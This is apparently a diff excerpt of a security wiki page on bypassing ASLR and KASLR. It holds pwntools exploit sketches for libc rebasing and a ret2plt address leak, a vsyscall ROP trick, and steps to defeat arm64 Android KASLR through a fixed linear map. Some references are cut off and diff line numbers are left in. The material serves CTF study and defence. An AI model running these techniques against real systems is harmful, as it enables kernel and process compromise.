If you are given a leak (as in easy CTF challenges), you can calculate offsets from it (supposing, for example, that you know the exact libc version used on the system you are exploiting). This example exploit is extracted from the [**example from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (check that page for more details):
<details>
<summary>Python exploit with given libc leak</summary>
```python
from pwn import *

# [...] (body elided in this diff: parse the leaked libc address, rebase
# libc on it, and build a ret2libc payload; see the linked page)

p.sendline(payload)

p.interactive()
```
</details>
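
For reference, here is a minimal sketch of the leak-to-offset arithmetic the exploit relies on (the file names, leaked symbol and leaked value are illustrative assumptions; only the rebasing idea is the point):

```python
from pwn import *

# Known libc build: every symbol sits at a constant offset from the leak.
libc = ELF('./libc.so.6')      # the libc used by the target (assumed path)
leaked_puts = 0x7f1234567890   # illustrative value parsed from program output

libc.address = leaked_puts - libc.sym['puts']  # rebase libc on the leak
system = libc.sym['system']                    # now resolves to its runtime address
binsh = next(libc.search(b'/bin/sh'))          # '/bin/sh' string inside libc
```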
**ret2plt**
By abusing a buffer overflow it is possible to perform a **ret2plt** attack to exfiltrate the address of a libc function. Check:
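
As a rough sketch of the idea (64-bit, no PIE; the overflow offset, gadget address and binary name are assumptions for illustration): the chain calls `puts@plt` with `puts@got` as its argument to print the runtime address of `puts`, then returns to `main` so a second-stage ret2libc payload can be sent:

```python
from pwn import *

# Hypothetical vulnerable binary with a stack overflow at offset 72.
elf = ELF('./vuln')
p = process('./vuln')

POP_RDI = 0x401234                               # assumed 'pop rdi; ret' gadget
payload  = b'A' * 72                             # assumed offset to saved RIP
payload += p64(POP_RDI) + p64(elf.got['puts'])   # arg: puts@GOT entry
payload += p64(elf.plt['puts'])                  # puts@plt prints its content
payload += p64(elf.symbols['main'])              # restart for stage 2

p.sendline(payload)
leaked_puts = u64(p.recvline().strip().ljust(8, b'\x00'))
log.success(f'puts @ {hex(leaked_puts)}')        # libc base = leak - libc puts offset
```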
For instance, an attacker might use the address `0xffffffffff600800` within an exploit. While attempting to jump directly to a `ret` instruction might lead to instability or crashes after executing a couple of gadgets, jumping to the start of a `syscall` provided by the **vsyscall** section can prove successful. By carefully placing a **ROP** gadget that leads execution to this **vsyscall** address, an attacker can achieve code execution without needing to bypass **ASLR** for this part of the exploit.
<details>

<summary>Example vmmap/vsyscall and gadget lookup</summary>

```
# Illustrative listing (the original output is elided in this diff). The
# [vsyscall] mapping always sits at this fixed range; in emulate/xonly mode
# the page holds one "mov rax, NR; syscall; ret" stub per vsyscall, e.g.
# getcpu at offset 0x800:
gef➤  vmmap
[...]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]

gef➤  x/3i 0xffffffffff600800
   0xffffffffff600800:  mov rax, 0x135   # __NR_getcpu
   0xffffffffff600807:  syscall
   0xffffffffff600809:  ret
```

</details>
Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO, as the vdso address won't be randomized. For more info check:
### KASLR on ARM64 (Android): bypass via fixed linear map
On many arm64 Android kernels, the base of the kernel linear map (direct map) is fixed across boots. Kernel VAs for physical pages therefore become predictable, breaking KASLR for any target reachable via the direct map.
- For CONFIG_ARM64_VA_BITS=39 (4 KiB pages, 3-level paging), the linear map base `PAGE_OFFSET` is the fixed value `0xffffff8000000000` (used in the translation formula below).
- No separate KASLR leak needed if the target is in/reachable via the direct map (e.g., page tables, kernel objects on physical pages you can influence/observe).
- Simplifies reliable arbitrary R/W and targeting of kernel data on arm64 Android.
**Reproduction summary**
1) `grep memstart /proc/kallsyms` -> address of `memstart_addr`
2) Kernel read -> decode 8 bytes LE -> `PHYS_OFFSET`
3) Use `virt = ((phys - PHYS_OFFSET) | PAGE_OFFSET)` with `PAGE_OFFSET=0xffffff8000000000` (see the sketch below)
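
A minimal Python sketch of steps 2 and 3 (`kread` is a hypothetical stand-in for whatever kernel read primitive you have; only the decoding and the translation formula come from the steps above):

```python
import struct

PAGE_OFFSET = 0xffffff8000000000  # fixed linear map base for VA_BITS=39

def get_phys_offset(kread, memstart_addr_va):
    # Step 2: read the 8-byte little-endian value of memstart_addr
    # (its kernel VA comes from /proc/kallsyms in step 1)
    return struct.unpack("<Q", kread(memstart_addr_va, 8))[0]

def phys_to_virt(phys, phys_offset):
    # Step 3: translate a physical address into its linear-map VA
    return (phys - phys_offset) | PAGE_OFFSET
```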
345
+
346
+
> [!NOTE]
> Access to tracing-BPF helpers requires sufficient privileges; any kernel read primitive or info leak suffices to obtain `PHYS_OFFSET`.
**How it’s fixed**
- The limited kernel VA space, plus CONFIG_MEMORY_HOTPLUG reserving VA for future hotplug, pushes the linear map to the lowest possible VA, yielding a fixed base.